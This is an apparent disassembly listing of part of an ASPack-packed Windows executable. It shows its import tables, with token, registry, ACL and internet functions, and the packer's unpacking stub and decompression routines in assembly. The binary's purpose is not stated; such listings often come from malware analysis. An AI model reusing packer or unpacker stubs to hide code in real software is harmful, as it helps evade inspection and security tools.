dword_4484EC dd 77DD7753h ; resolved to->ADVAPI32.OpenProcessTokendword_4484F0 dd 77DD7B76h ; resolved to->ADVAPI32.GetTokenInformationdword_4484F4 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_4484F8 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKeydword_4484FC dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExAdword_448500 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_448504 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_448508 dd 77DF08D5h ; resolved to->ADVAPI32.GetSecurityInfodword_44850C dd 77DF087Fh ; resolved to->ADVAPI32.SetSecurityInfodword_448510 dd 77E215D9h ; resolved to->ADVAPI32.SetEntriesInAclAdword_448514 dd 77DFD4B0h ; resolved to->ADVAPI32.GetSidIdentifierAuthoritydword_448518 dd 77DF9839h ; resolved to->ADVAPI32.GetSidSubAuthoritydword_44851C dd 77DF986Bh ; resolved to->ADVAPI32.GetSidSubAuthorityCount dd 2 dup(0)
dword_448528 dd 73D96FEBh dword_44852C dd 73D91C28h dword_448530 dd 73D92B86h dword_448534 dd 73D9A3B0h dword_448538 dd 73D9B9A2h dword_44853C dd 73D91F60h dword_448540 dd 73D9D320h dword_448544 dd 73D9D340h dword_448548 dd 73D9D5E0h dword_44854C dd 73D9242Ch dword_448550 dd 73D9DBAFh dword_448554 dd 73D92226h dword_448558 dd 73D9E5C5h dword_44855C dd 73D9DBA2h dword_448560 dd 73D9E61Eh dword_448564 dd 73D9E65Ch dword_448568 dd 73D9E69Ch dword_44856C dd 73D9F24Ch dd 0
dd 79530046h, 6C6C4173h, 7453636Fh, 676E6972h, 0
dd 69460015h, 6946646Eh, 55747372h, 61436C72h, 45656863h
dd 7972746Eh, 41h, 6946001Ch, 654E646Eh, 72557478h, 6361436Ch
dd 6E456568h, 41797274h, 0
dd 6F43006Ah, 61657243h, 6E496574h, 6E617473h, 6563h, 4C43007Ch
dd 46444953h, 536D6F72h, 6E697274h, 67h, 6F430058h, 74696E49h
dd 696C6169h, 657Ah, 6F43005Bh, 6E696E55h, 61697469h, 657A696Ch
dd 0
dd 6544006Bh, 6574656Ch, 656C6946h, 41h, 7845009Bh, 72507469h
dd 7365636Fh, 73h, 7845009Dh, 646E6170h, 69766E45h, 6D6E6F72h
dd 53746E65h, 6E697274h, 417367h, 654700EDh, 6D6F4374h
dd 646E616Dh, 656E694Ch, 41h, 65470112h, 72754374h, 746E6572h
dd 636F7250h, 49737365h, 64h, 65470115h, 72754374h, 746E6572h
dd 65726854h, 64496461h, 0
dd 6547012Fh, 6C694674h, 7A695365h, 65h, 65470131h, 6C694674h
dd 6D695465h, 65h, 6547013Ch, 73614C74h, 72724574h, 726Fh
dd 65470147h, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
dd 65470149h, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 65470167h
dd 6F725074h, 64644163h, 73736572h, 0
dd 6547016Ah, 6F725074h, 73736563h, 70616548h, 0
dd 65470188h, 73795374h, 446D6574h, 63657269h, 79726F74h
dd 41h, 6C430027h, 4865736Fh, 6C646E61h, 65h, 6547019Ah
dd 6D655474h, 74615070h, 4168h, 654701A4h, 63695474h, 756F436Bh
dd 746Eh, 654701ACh, 72655674h, 6E6F6973h, 0
dd 654701ADh, 72655674h, 6E6F6973h, 417845h, 654701AFh
dd 6C6F5674h, 49656D75h, 726F666Eh, 6974616Dh, 416E6Fh
dd 654701B7h, 6E695774h, 73776F64h, 65726944h, 726F7463h
dd 4179h, 6C4701BAh, 6C61626Fh, 41646441h, 416D6F74h, 0
dd 6C4701BEh, 6C61626Fh, 656C6544h, 74416574h, 6D6Fh, 6C4701BFh
dd 6C61626Fh, 646E6946h, 6D6F7441h, 41h, 6C4701C8h, 6C61626Fh
dd 6F6D654Dh, 74537972h, 73757461h, 0
dd 6E4901EBh, 6C726574h, 656B636Fh, 636E4964h, 656D6572h
dd 746Eh, 734901F1h, 52646142h, 50646165h, 7274h, 734901F4h
dd 57646142h, 65746972h, 727450h, 734901F7h, 75626544h
dd 72656767h, 73657250h, 746E65h, 6F4C0203h, 694C6461h
dd 72617262h, 4179h, 6F430033h, 69467970h, 41656Ch, 6F4C0209h
dd 416C6163h, 636F6C6Ch, 0
dd 6F4C020Dh, 466C6163h, 656572h, 704F0230h, 754D6E65h
dd 41786574h, 0
dd 704F0232h, 72506E65h, 7365636Fh, 73h, 6552025Ch, 69466461h
dd 656Ch, 74520278h, 776E556Ch, 646E69h, 74520279h, 72655A6Ch
dd 6D654D6Fh, 79726Fh, 72430042h, 65746165h, 656C6946h
dd 41h, 655302A8h, 6C694674h, 696F5065h, 7265746Eh, 0
dd 655302ACh, 6C694674h, 6D695465h, 65h, 6C5302DCh, 706565h
dd 655402E4h, 6E696D72h, 50657461h, 65636F72h, 7373h, 695602FEh
dd 61757472h, 6C6C416Ch, 636Fh, 69560300h, 61757472h, 6572466Ch
dd 65h, 69560305h, 61757472h, 6575516Ch, 7972h, 69570311h
dd 68436564h, 6F547261h, 746C754Dh, 74794269h, 65h, 69570312h
dd 6578456Eh, 63h, 7257031Dh, 46657469h, 656C69h, 7243004Fh
dd 65746165h, 6574754Dh, 4178h, 736C0345h, 656C7274h, 416Eh
dd 736C0346h, 656C7274h, 576Eh, 72430054h, 65746165h, 636F7250h
dd 41737365h, 0
dd 7243005Ah, 65746165h, 65726854h, 6461h, 61430063h, 69576C6Ch
dd 776F646Eh, 636F7250h, 41h, 6547006Ch, 6E695774h, 54776F64h
dd 41747865h, 0
dd 65470073h, 6E695774h, 52776F64h, 746365h, 69460078h
dd 6957646Eh, 776F646Eh, 41h, 6547007Ch, 6E695774h, 776F64h
dd 65470011h, 616C4374h, 614E7373h, 41656Dh, 655300CFh
dd 636F4674h, 7375h, 654700D4h, 726F4674h, 6F726765h, 57646E75h
dd 6F646E69h, 77h, 6F4C0019h, 75436461h, 726F7372h, 41h
dd 6553010Ah, 6D695474h, 7265h, 6F4C001Bh, 63496461h, 416E6Fh
dd 654D0140h, 67617373h, 786F4265h, 41h, 65470023h, 73654D74h
dd 65676173h, 41h, 65470169h, 6E695774h, 4C776F64h, 41676E6Fh
dd 0
dd 6553016Bh, 6E695774h, 4C776F64h, 41676E6Fh, 0
dd 7243016Eh, 65746165h, 6B736544h, 41706F74h, 0
dd 65530175h, 72685474h, 44646165h, 746B7365h, 706Fh, 65470176h
dd 72685474h, 44646165h, 746B7365h, 706Fh, 72540027h, 6C736E61h
dd 4D657461h, 61737365h, 6567h, 69440028h, 74617073h, 654D6863h
dd 67617373h, 4165h, 737701FBh, 6E697270h, 416674h, 65530034h
dd 654D646Eh, 67617373h, 4165h, 65520005h, 74736967h, 6C437265h
dd 41737361h, 0
dd 6F500041h, 75517473h, 654D7469h, 67617373h, 65h, 6853004Fh
dd 6957776Fh, 776F646Eh, 0
dd 72430053h, 65746165h, 646E6957h, 7845776Fh, 41h, 65440055h
dd 6F727473h, 6E695779h, 776F64h, 6F4D005Ah, 69576576h
dd 776F646Eh, 0
dd 65440061h, 6E695766h, 50776F64h, 41636F72h, 0
dd 65470089h, 6F745374h, 624F6B63h, 7463656Ah, 0
dd 655300CAh, 436B4274h, 726F6C6Fh, 0
dd 655300DDh, 78655474h, 6C6F4374h, 726Fh, 724300FAh, 65746165h
dd 73757242h, 646E4968h, 63657269h, 74h, 7243001Ch, 65746165h
dd 746E6F46h, 41h, 704F0018h, 72506E65h, 7365636Fh, 6B6F5473h
dd 6E65h, 6547001Ah, 6B6F5474h, 6E496E65h, 6D726F66h, 6F697461h
dd 6Eh, 65520173h, 65724367h, 4B657461h, 78457965h, 41h
dd 65520176h, 6F6C4367h, 654B6573h, 79h, 6552017Bh, 65704F67h
dd 79654B6Eh, 417845h, 65520186h, 65755167h, 61567972h
dd 4565756Ch, 4178h, 65520192h, 74655367h, 756C6156h, 41784565h
dd 0
dd 654701CCh, 63655374h, 74697275h, 666E4979h, 6Fh, 655301CFh
dd 63655374h, 74697275h, 666E4979h, 6Fh, 655301D6h, 746E4574h
dd 73656972h, 63416E49h, 416Ch, 6547004Ah, 64695374h, 6E656449h
dd 69666974h, 75417265h, 726F6874h, 797469h, 6547004Bh
dd 64695374h, 41627553h, 6F687475h, 79746972h, 0
dd 6547004Ch, 64695374h, 41627553h, 6F687475h, 79746972h
dd 6E756F43h, 74h, 695F00E8h, 616F74h, 5F5F0018h, 4D746547h
dd 416E6961h, 736772h, 735F0181h, 7065656Ch, 0
dd 735F01A6h, 63697274h, 706Dh, 626101F6h, 73h, 7865020Ah
dd 7469h, 656D0253h, 706D636Dh, 0
dd 656D0254h, 7970636Dh, 0
dd 656D0256h, 7465736Dh, 0
dd 61720260h, 657369h, 61720261h, 646Eh, 6973026Ah, 6C616E67h
dd 0
dd 7073026Dh, 746E6972h, 66h, 7273026Fh, 646E61h, 73730270h
dd 666E6163h, 0
dd 74730271h, 74616372h, 0
dd 74730272h, 72686372h, 0
dd 7473027Bh, 6D636E72h, 70h, 41454C4Fh, 32335455h, 4C4C442Eh
dd 0
dd offset off_448000
aWininet_dll db 'WININET.DLL',0
dd offset off_448014
dd offset off_448014
aOle32_dll db 'ole32.DLL',0
align 4
dd offset off_448028
dd offset off_448028
dd offset off_448028
dd offset off_448028
aKernel32_dll_1 db 'KERNEL32.dll',0
align 4
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
aUser32_dll_0 db 'USER32.DLL',0
align 4
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
aGdi32_dll db 'GDI32.DLL',0
align 4
dd offset off_448064
dd offset off_448064
dd offset off_448064
dd offset off_448064
dd offset off_448064
aAdvapi32_dll_0 db 'ADVAPI32.DLL',0
align 4
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
aCrtdll_dll db 'CRTDLL.DLL',0
align 4
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
align 1000h
_idata ends
; Section 5. (virtual address 0004A000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 0004A000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_aspack segment para public 'CODE' use32
assume cs:_aspack
;org 44A000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
db 90h
; =============== S U B R O U T I N E =======================================
public start
start proc near
pusha
call sub_44A577
jmp short loc_44A055
; ---------------------------------------------------------------------------
align 4
dd 0D9000000h, 4873h, 90DB8700h, 6 dup(0)
dd 4A00001h, 0AE000000h, 0AC000000h, 809A5100h, 809AE47Ch
dd 7Ch, 3 dup(0)
db 0
; ---------------------------------------------------------------------------
loc_44A055: ; CODE XREF: start+6�j
mov ebx, offset dword_4439A4
add ebx, ebp
sub ebx, ss:dword_4439D5[ebp]
cmp ss:dword_444804[ebp], 0
mov ss:dword_444804[ebp], ebx
jnz loc_44A4DB
lea eax, dword_44480C[ebp]
push eax
call ss:dword_444918[ebp]
mov ss:dword_444808[ebp], eax
mov edi, eax
lea ebx, dword_444819[ebp]
push ebx
push eax
call ss:dword_444914[ebp]
mov ss:dword_4439E1[ebp], eax
lea ebx, dword_444826[ebp]
push ebx
push edi
call ss:dword_444914[ebp]
mov ss:dword_4439E5[ebp], eax
lea eax, dword_443B72[ebp]
jmp eax
; ---------------------------------------------------------------------------
align 10h
dd 40h, 2 dup(0)
dd 80000000h, 12190004h, 2 dup(0)
dd 10000000h, 0BC980000h, 0C0000000h, 0BBCC0003h, 80000000h
dd 10540004h, 36h dup(0)
dd 9D8B0000h, 443A66h, 0A74DB0Bh, 8587038Bh, 443A6Ah, 0B58D0389h
dd 443A82h, 0F003E83h, 11D84h, 82B58D00h, 6A00443Ah, 10006804h
dd 680000h, 6A000018h, 0E195FF00h, 89004439h, 4439DD85h
dd 4468B00h, 10E05h, 68046A00h, 1000h, 0FF006A50h, 4439E195h
dd 0D9858900h, 56004439h, 9D031E8Bh, 444804h, 39DDB5FFh
dd 76FF0044h, 0E8535004h, 339h, 39D4BD80h, 75000044h, 0D485FE5Ch
dd 8B004439h, 4BD033Eh, 0FF004448h, 0C307C637h, 78FD7FFh
dd 53565150h, 0E983C88Bh, 0D9B58B06h, 33004439h, 74C90BDBh
dd 0E83CAC2Ch, 0EB0A74h, 474E93Ch, 0EDEB4943h, 0EB068Bh
dd 75063E80h, 0C10024F3h, 0C32B18C0h, 0C3830689h, 4C68305h
dd 0EB05E983h, 595E5BD0h, 8BC88B58h, 4BD033Eh, 8B004448h
dd 4439D9B5h, 2F9C100h, 0C88BA5F3h, 0F303E183h, 685EA4h
dd 6A000080h, 0D9B5FF00h, 0FF004439h, 4439E595h, 8C68300h
dd 0F003E83h, 0FFFF2885h, 800068FFh, 6A0000h, 39DDB5FFh
dd 95FF0044h, 4439E5h, 3A669D8Bh, 0DB0B0044h, 38B0874h
dd 3A6A8587h, 958B0044h, 444804h, 3A62858Bh, 0D02B0044h
dd 0C28B7974h, 3310E8C1h, 6EB58BDBh, 300443Ah, 444804B5h
dd 3E8300h, 4E8B6174h, 8E98304h, 3E8BE9D1h, 4804BD03h
dd 0C6830044h, 1E8B6608h, 830CEBC1h, 0C7401FBh, 7402FB83h
dd 3FB8316h, 2CEB2074h, 811E8B66h, 0FFFE3h, 4016600h, 661DEB1Fh
dd 0E3811E8Bh, 0FFFh, 1F140166h, 8B660EEBh, 0FFE3811Eh
dd 100000Fh, 0EB1F14h, 0FF0E8366h, 0E202C683h, 8B9AEBB4h
dd 44480495h, 0ADB58B00h, 0B004439h, 31174F6h, 0C00BADF2h
dd 0C2030A74h, 0AD66F88Bh, 0F1EBAB66h, 3A72B58Bh, 958B0044h
dd 444804h, 468BF203h, 0FC0850Ch, 10A84h, 8BC20300h, 95FF50D8h
dd 444918h, 775C085h, 1C95FF53h, 89004449h, 4439B185h
dd 0B585C700h, 4439h, 8B000000h, 44480495h, 85068B00h
dd 8B0375C0h, 0C2031046h, 39B58503h, 188B0044h, 3107E8Bh
dd 0B5BD03FAh, 85004439h, 0A2840FDBh, 0F7000000h, 0C3h
dd 3047580h, 534343DAh, 0FFFFE381h, 0FF537FFFh, 4439B1B5h
dd 1495FF00h, 85004449h, 6F755BC0h, 0C3F7h, 19758000h
dd 0C468B57h, 48048503h, 53500044h, 487F858Dh, 57500044h
dd 99E9h, 0FFE38100h, 8B7FFFFFh, 44480885h, 0B1853900h
dd 75004439h, 0D38B5724h, 2E2C14Ah, 39B19D8Bh, 7B8B0044h
dd 3B7C8B3Ch, 3B5C0378h, 13048B1Ch, 39B18503h, 0EB5F0044h
dd 468B5716h, 485030Ch, 50004448h, 0D0858D53h, 50004448h
dd 894BEB57h, 0B5858307h, 4004439h, 0FFFF32E9h, 890689FFh
dd 46890C46h, 14C68310h, 4804958Bh, 0EBE90044h
db 0FEh, 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_44A4DB: ; CODE XREF: start+6E�j
mov eax, ss:dword_443A76[ebp]
push eax
add eax, ss:dword_444804[ebp]
pop ecx
or ecx, ecx
mov ss:dword_443EA1[ebp], eax
popa
jnz short loc_44A4FC
mov eax, 1
retn 0Ch
; ---------------------------------------------------------------------------
loc_44A4FC: ; CODE XREF: start+4F1�j
push offset sub_401219
retn
start endp
; ---------------------------------------------------------------------------
mov eax, ss:dword_444808[ebp]
lea ecx, [ebp+444841h]
push ecx
push eax
call ss:dword_444914[ebp]
mov [ebp+4439EDh], eax
lea eax, [ebp+444851h]
push eax
call ss:dword_44491C[ebp]
mov [ebp+44484Dh], eax
lea ecx, [ebp+44485Ch]
push ecx
push eax
call ss:dword_444914[ebp]
mov [ebp+4439F1h], eax
mov eax, [ebp+44484Dh]
lea ecx, [ebp+444868h]
push ecx
push eax
call ss:dword_444914[ebp]
call eax
add esp, 10h
pop edi
push 30h
lea ebx, [ebp+444872h]
push ebx
push edi
push 0
call dword ptr [ebp+4439F1h]
push 0FFFFFFFFh
call dword ptr [ebp+4439EDh]
; =============== S U B R O U T I N E =======================================
sub_44A577 proc near ; CODE XREF: start+1�p
mov ebp, [esp+0]
sub ebp, offset byte_4439AB
retn
sub_44A577 endp
; ---------------------------------------------------------------------------
mov eax, [esp+10h]
sub esp, 354h
lea ecx, [esp+4]
push eax
call sub_44A93D
mov ecx, [esp+35Ch]
mov edx, [esp+358h]
push ecx
push edx
lea ecx, [esp+0Ch]
call sub_44A9BB
test al, al
jnz short loc_44A5BC
or eax, 0FFFFFFFFh
add esp, 354h
retn
; ---------------------------------------------------------------------------
loc_44A5BC: ; CODE XREF: .aspack:0044A5B0�j
mov ecx, [esp+360h]
lea eax, [esp]
push eax
push ecx
lea ecx, [esp+0Ch]
call sub_44ABC0
test al, al
jnz short loc_44A5DF
or eax, 0FFFFFFFFh
add esp, 354h
retn
; ---------------------------------------------------------------------------
loc_44A5DF: ; CODE XREF: .aspack:0044A5D3�j
mov eax, [esp]
add esp, 354h
retn 10h
; ---------------------------------------------------------------------------
align 4
dd 4030201h, 8070605h, 100E0C0Ah, 201C1814h, 40383028h
dd 80706050h, 0E0C0A0h, 0
dd 1000000h, 2010101h, 3020202h, 4030303h, 5040404h, 50505h
dd 1000000h, 3020201h, 5040403h, 7060605h, 9080807h, 0B0A0A09h
dd 0D0C0C0Bh, 0F0E0E0Dh, 1110100Fh, 3 dup(11111111h), 12121211h
dd 12121212h
db 12h
; =============== S U B R O U T I N E =======================================
sub_44A65D proc near ; CODE XREF: sub_44AA1C+13�p
; sub_44AA1C+30�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
mov edx, ecx
push esi
mov ecx, 8
push edi
cmp [edx+4], ecx
jb short loc_44A6A1
push ebx
mov esi, 0FFFFFFF8h
loc_44A672: ; CODE XREF: sub_44A65D+41�j
mov eax, [edx]
mov bl, [eax]
inc eax
mov byte ptr [esp+10h+var_4], bl
mov [edx], eax
mov eax, [edx+8]
mov edi, [esp+10h+var_4]
shl eax, 8
and edi, 0FFh
or eax, edi
mov edi, [edx+4]
add edi, esi
mov [edx+8], eax
mov eax, edi
mov [edx+4], edi
cmp eax, ecx
jnb short loc_44A672
pop ebx
loc_44A6A1: ; CODE XREF: sub_44A65D+D�j
mov esi, [edx+4]
mov eax, [edx+8]
mov edi, [esp+0Ch+arg_0]
sub ecx, esi
shr eax, cl
mov ecx, 18h
sub ecx, edi
and eax, 0FFFFFFh
shr eax, cl
add esi, edi
pop edi
mov [edx+4], esi
pop esi
pop ecx
retn 4
sub_44A65D endp
; =============== S U B R O U T I N E =======================================
sub_44A6C8 proc near ; CODE XREF: sub_44A93D+3E�p
; sub_44A93D+4C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov edx, [esp+arg_4]
mov [ecx+84h], eax
mov [ecx+88h], edx
lea eax, [edx+eax*4]
mov [ecx+8Ch], eax
add eax, 100h
retn 8
sub_44A6C8 endp
; =============== S U B R O U T I N E =======================================
sub_44A6ED proc near ; CODE XREF: sub_44AA1C+4C�p
; sub_44AA1C+F7�p ...
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
arg_0 = dword ptr 4
sub esp, 98h
push ebx
push ebp
push esi
mov edx, ecx
push edi
mov ecx, 0Fh
mov ebp, [edx+84h]
xor eax, eax
lea edi, [esp+0A8h+var_7C]
xor esi, esi
rep stosd
mov edi, [esp+0A8h+arg_0]
cmp ebp, esi
mov [esp+0A8h+var_88], edx
jbe short loc_44A732
loc_44A71D: ; CODE XREF: sub_44A6ED+43�j
xor ecx, ecx
mov cl, [eax+edi]
mov ebx, [esp+ecx*4+0A8h+var_80]
lea ecx, [esp+ecx*4+0A8h+var_80]
inc ebx
inc eax
cmp eax, ebp
mov [ecx], ebx
jb short loc_44A71D
loc_44A732: ; CODE XREF: sub_44A6ED+2E�j
mov ecx, 17h
mov [esp+0A8h+var_80], esi
mov [edx+4], esi
mov [edx+44h], esi
mov [esp+0A8h+var_40], esi
xor edi, edi
mov [esp+0A8h+var_8C], esi
mov [esp+0A8h+var_98], 1
mov [esp+0A8h+var_90], ecx
lea ebp, [edx+8]
mov [esp+0A8h+var_94], esi
loc_44A75E: ; CODE XREF: sub_44A6ED+109�j
mov eax, [esp+esi+0A8h+var_7C]
shl eax, cl
add edi, eax
cmp edi, 1000000h
mov [esp+0A8h+var_84], edi
ja loc_44A804
mov eax, [esp+esi+0A8h+var_80]
mov [ebp+0], edi
mov ebx, [ebp+3Ch]
add eax, ebx
cmp ecx, 10h
mov [ebp+40h], eax
mov [esp+esi+0A8h+var_3C], eax
jl short loc_44A7DB
mov esi, [ebp+0]
mov eax, [esp+0A8h+var_98]
mov ebx, [esp+0A8h+var_8C]
mov edi, [edx+8Ch]
shr esi, 10h
mov ecx, esi
and eax, 0FFh
sub ecx, ebx
add edi, ebx
mov bl, al
mov edx, ecx
mov bh, bl
mov [esp+0A8h+var_8C], esi
mov eax, ebx
mov esi, [esp+0A8h+var_94]
shl eax, 10h
mov ax, bx
shr ecx, 2
rep stosd
mov ecx, edx
mov edx, [esp+0A8h+var_88]
and ecx, 3
rep stosb
mov edi, [esp+0A8h+var_84]
mov ecx, [esp+0A8h+var_90]
loc_44A7DB: ; CODE XREF: sub_44A6ED+9F�j
mov eax, [esp+0A8h+var_98]
add esi, 4
inc eax
dec ecx
add ebp, 4
cmp ecx, 9
mov [esp+0A8h+var_98], eax
mov [esp+0A8h+var_90], ecx
mov [esp+0A8h+var_94], esi
jge loc_44A75E
cmp edi, 1000000h
jz short loc_44A813
loc_44A804: ; CODE XREF: sub_44A6ED+83�j
pop edi
pop esi
pop ebp
xor al, al
pop ebx
add esp, 98h
retn 4
; ---------------------------------------------------------------------------
loc_44A813: ; CODE XREF: sub_44A6ED+115�j
mov eax, [edx+84h]
xor ecx, ecx
test eax, eax
jbe short loc_44A85A
mov esi, [esp+0A8h+arg_0]
loc_44A826: ; CODE XREF: sub_44A6ED+16B�j
mov al, [ecx+esi]
test al, al
jz short loc_44A84F
mov edi, [edx+88h]
and eax, 0FFh
mov eax, [esp+eax*4+0A8h+var_40]
mov [edi+eax*4], ecx
xor eax, eax
mov al, [ecx+esi]
mov edi, [esp+eax*4+0A8h+var_40]
lea eax, [esp+eax*4+0A8h+var_40]
inc edi
mov [eax], edi
loc_44A84F: ; CODE XREF: sub_44A6ED+13E�j
mov eax, [edx+84h]
inc ecx
cmp ecx, eax
jb short loc_44A826
loc_44A85A: ; CODE XREF: sub_44A6ED+130�j
pop edi
pop esi
pop ebp
mov al, 1
pop ebx
add esp, 98h
retn 4
sub_44A6ED endp
; =============== S U B R O U T I N E =======================================
sub_44A869 proc near ; CODE XREF: sub_44AA1C+64�p
; sub_44ABC0+28�p ...
var_4 = dword ptr -4
push ecx
push ebx
push esi
mov esi, ecx
push edi
mov eax, [esi]
cmp dword ptr [eax+4], 8
jb short loc_44A8A7
loc_44A877: ; CODE XREF: sub_44A869+3C�j
mov ecx, [eax]
mov dl, [ecx]
inc ecx
mov byte ptr [esp+10h+var_4], dl
mov [eax], ecx
mov ecx, [eax+8]
mov edx, [esp+10h+var_4]
shl ecx, 8
and edx, 0FFh
or ecx, edx
mov edx, [eax+4]
add edx, 0FFFFFFF8h
mov [eax+8], ecx
mov ecx, edx
mov [eax+4], edx
cmp ecx, 8
jnb short loc_44A877
loc_44A8A7: ; CODE XREF: sub_44A869+C�j
mov edx, [eax+4]
mov eax, [eax+8]
mov ecx, 8
sub ecx, edx
shr eax, cl
mov ecx, [esi+24h]
and eax, 0FFFE00h
cmp eax, ecx
jnb short loc_44A8D6
mov edx, [esi+8Ch]
mov ecx, eax
shr ecx, 10h
xor ebx, ebx
mov bl, [ecx+edx]
mov edx, ebx
jmp short loc_44A911
; ---------------------------------------------------------------------------
loc_44A8D6: ; CODE XREF: sub_44A869+57�j
cmp eax, [esi+2Ch]
jnb short loc_44A8E5
cmp eax, [esi+28h]
sbb edx, edx
add edx, 0Ah
jmp short loc_44A911
; ---------------------------------------------------------------------------
loc_44A8E5: ; CODE XREF: sub_44A869+70�j
cmp eax, [esi+30h]
jnb short loc_44A8F1
mov edx, 0Bh
jmp short loc_44A911
; ---------------------------------------------------------------------------
loc_44A8F1: ; CODE XREF: sub_44A869+7F�j
cmp eax, [esi+34h]
jnb short loc_44A8FD
mov edx, 0Ch
jmp short loc_44A911
; ---------------------------------------------------------------------------
loc_44A8FD: ; CODE XREF: sub_44A869+8B�j
cmp eax, [esi+38h]
jnb short loc_44A909
mov edx, 0Dh
jmp short loc_44A911
; ---------------------------------------------------------------------------
loc_44A909: ; CODE XREF: sub_44A869+97�j
cmp eax, [esi+3Ch]
sbb edx, edx
add edx, 0Fh
loc_44A911: ; CODE XREF: sub_44A869+6B�j
; sub_44A869+7A�j ...
mov ecx, [esi]
mov edi, [ecx+4]
add edi, edx
mov [ecx+4], edi
mov ebx, [esi+edx*4]
mov ecx, 18h
sub eax, ebx
sub ecx, edx
pop edi
shr eax, cl
mov ecx, [esi+edx*4+44h]
add eax, ecx
mov ecx, [esi+88h]
pop esi
pop ebx
mov eax, [ecx+eax*4]
pop ecx
retn
sub_44A869 endp
; =============== S U B R O U T I N E =======================================
sub_44A93D proc near ; CODE XREF: .aspack:0044A590�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
mov edi, ecx
xor edx, edx
xor eax, eax
lea esi, [edi+268h]
loc_44A94C: ; CODE XREF: sub_44A93D+2F�j
mov [esi], edx
push esi
call sub_44ABB2
mov cl, [eax+esi+443FC7h]
pop esi
mov ebx, 1
add esi, 4
shl ebx, cl
add edx, ebx
inc eax
cmp eax, 3Ah
jb short loc_44A94C
mov eax, [esp+0Ch+arg_0]
lea ecx, [edi+10h]
push eax
push 2D1h
call sub_44A6C8
push eax
push 1Ch
lea ecx, [edi+0A0h]
call sub_44A6C8
push eax
push 8
lea ecx, [edi+130h]
call sub_44A6C8
push eax
push 13h
lea ecx, [edi+1C0h]
call sub_44A6C8
mov [edi+260h], eax
pop edi
pop esi
add eax, 2F5h
pop ebx
retn 4
sub_44A93D endp
; =============== S U B R O U T I N E =======================================
sub_44A9BB proc near ; CODE XREF: .aspack:0044A5A9�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov edx, ecx
mov ecx, [esp+arg_0]
push edi
mov [edx], eax
lea eax, [edx+4]
mov [eax], ecx
mov dword ptr [eax+4], 20h
mov [edx+10h], eax
mov [edx+0A0h], eax
mov [edx+130h], eax
mov [edx+1C0h], eax
xor eax, eax
mov ecx, 0BDh
mov [edx+250h], eax
mov [edx+254h], eax
mov [edx+258h], eax
mov edi, [edx+260h]
mov [edx+25Ch], eax
rep stosd
mov ecx, edx
stosb
call sub_44AA1C
pop edi
retn 8
sub_44A9BB endp
; =============== S U B R O U T I N E =======================================
sub_44AA1C proc near ; CODE XREF: sub_44A9BB+58�p
; sub_44ABC0+267�p
var_30C = byte ptr -30Ch
var_2F9 = byte ptr -2F9h
var_2F8 = byte ptr -2F8h
var_27 = byte ptr -27h
var_B = byte ptr -0Bh
sub esp, 30Ch
push ebx
mov ebx, ecx
push ebp
push esi
lea ebp, [ebx+4]
push edi
push 1
mov ecx, ebp
call sub_44A65D
test eax, eax
jnz short loc_44AA46
mov edi, [ebx+260h]
mov ecx, 0BDh
rep stosd
stosb
loc_44AA46: ; CODE XREF: sub_44AA1C+1A�j
xor esi, esi
loc_44AA48: ; CODE XREF: sub_44AA1C+3D�j
